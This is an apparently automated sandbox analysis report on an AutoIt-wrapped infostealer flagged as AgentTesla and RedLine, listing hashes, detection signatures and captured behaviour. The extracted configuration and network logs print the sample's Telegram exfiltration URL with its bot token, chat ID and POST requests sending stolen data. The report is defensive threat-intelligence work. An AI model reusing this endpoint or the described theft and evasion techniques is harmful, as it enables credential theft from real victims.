Windows Analysis Report
Case_Your company bad driver Vehicle No.exe

Overview

General Information

Sample name: Case_Your company bad driver Vehicle No.exe
Analysis ID: 1436302
MD5: ac5df4d0010a0d3b07047c48eab42a3e
SHA1: fcbcdf06cec7d0b82091f8cf315507417bb4892f
SHA256: a118ce49e0877aa53eb801200c2c240e1b7faeeeda6f399cd12b14bda1bf6c6c
Tags: exe
Infos:

Detection

AgentTesla, PureLog Stealer, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection
barindex
Found malware configuration
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendMessage?chat_id=7062552884"}
Source: RegSvcs.exe.4864.15.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendMessage"}
Multi AV Scanner detection for submitted file
Source: Case_Your company bad driver Vehicle No.exe Virustotal: Detection: 67% Perma Link
Source: Case_Your company bad driver Vehicle No.exe ReversingLabs: Detection: 60%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\directory\name.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Case_Your company bad driver Vehicle No.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: Case_Your company bad driver Vehicle No.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: Binary string: _.pdb source: RegSvcs.exe, 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3841331858.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3845657517.00000000042D5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: name.exe, 00000008.00000003.3296361938.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.3296658216.0000000003830000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328159917.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328274117.0000000003950000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446492753.0000000004200000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446375928.0000000004060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: name.exe, 00000008.00000003.3296361938.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.3296658216.0000000003830000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328159917.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328274117.0000000003950000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446492753.0000000004200000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446375928.0000000004060000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C14696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00C14696
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00C1C9C7
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1C93C FindFirstFileW,FindClose, 0_2_00C1C93C
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C1F200
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C1F35D
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00C1F65E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C13A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C13A2B
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C13D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C13D4E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C1BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00C1BF27
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose, 8_2_00A24696
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 8_2_00A2C9C7
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A2C93C FindFirstFileW,FindClose, 8_2_00A2C93C
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00A2F200
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00A2F35D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A2F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 8_2_00A2F65E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00A23A2B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00A23D4E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A2BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 8_2_00A2BF27
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.8:49708 -> 149.154.167.220:443
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.8:49710 -> 149.154.167.220:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6c21c433b488Host: api.telegram.orgContent-Length: 918Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6c21c7120916Host: api.telegram.orgContent-Length: 887Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6c21cbde34e4Host: api.telegram.orgContent-Length: 918Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6c21ccf06265Host: api.telegram.orgContent-Length: 887Expect: 100-continue
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C225E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_00C225E2
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6c21c433b488Host: api.telegram.orgContent-Length: 918Expect: 100-continueConnection: Keep-Alive
Source: RegSvcs.exe, 0000000B.00000002.3452111397.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.00000000032E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 0000000B.00000002.3452111397.0000000002D07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.00000000032D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://account.dyn.com/
Source: RegSvcs.exe, 0000000B.00000002.3452111397.0000000002D07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3452111397.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.00000000032D7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.0000000003490000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.000000000328E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/
Source: RegSvcs.exe, 0000000B.00000002.3452111397.0000000002D03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3452111397.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.00000000032D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.0000000003490000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49710 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, cPKWk.cs .Net Code: M4pTMxBfC
Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C2425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00C2425A
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C24458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00C24458
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A34458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_00A34458
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C2425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00C2425A
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C10219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_00C10219
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C3CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00C3CDAC
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A4CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 8_2_00A4CDAC

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.name.exe.33a0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.name.exe.3710000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000A.00000002.3336864673.0000000003710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000008.00000002.3304083272.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000B.00000002.3449507339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000E.00000002.3449893133.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: This is a third-party compiled AutoIt script. 0_2_00BB3B4C
Source: Case_Your company bad driver Vehicle No.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Case_Your company bad driver Vehicle No.exe, 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_847bcc26-5
Source: Case_Your company bad driver Vehicle No.exe, 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_4d9c76af-9
Source: Case_Your company bad driver Vehicle No.exe, 00000000.00000003.3276476256.0000000003E55000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_8fb44ef2-6
Source: Case_Your company bad driver Vehicle No.exe, 00000000.00000003.3276476256.0000000003E55000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_c659b848-3
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: This is a third-party compiled AutoIt script. 8_2_009C3B4C
Source: name.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 00000008.00000000.3288300355.0000000000A75000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_a59d631b-0
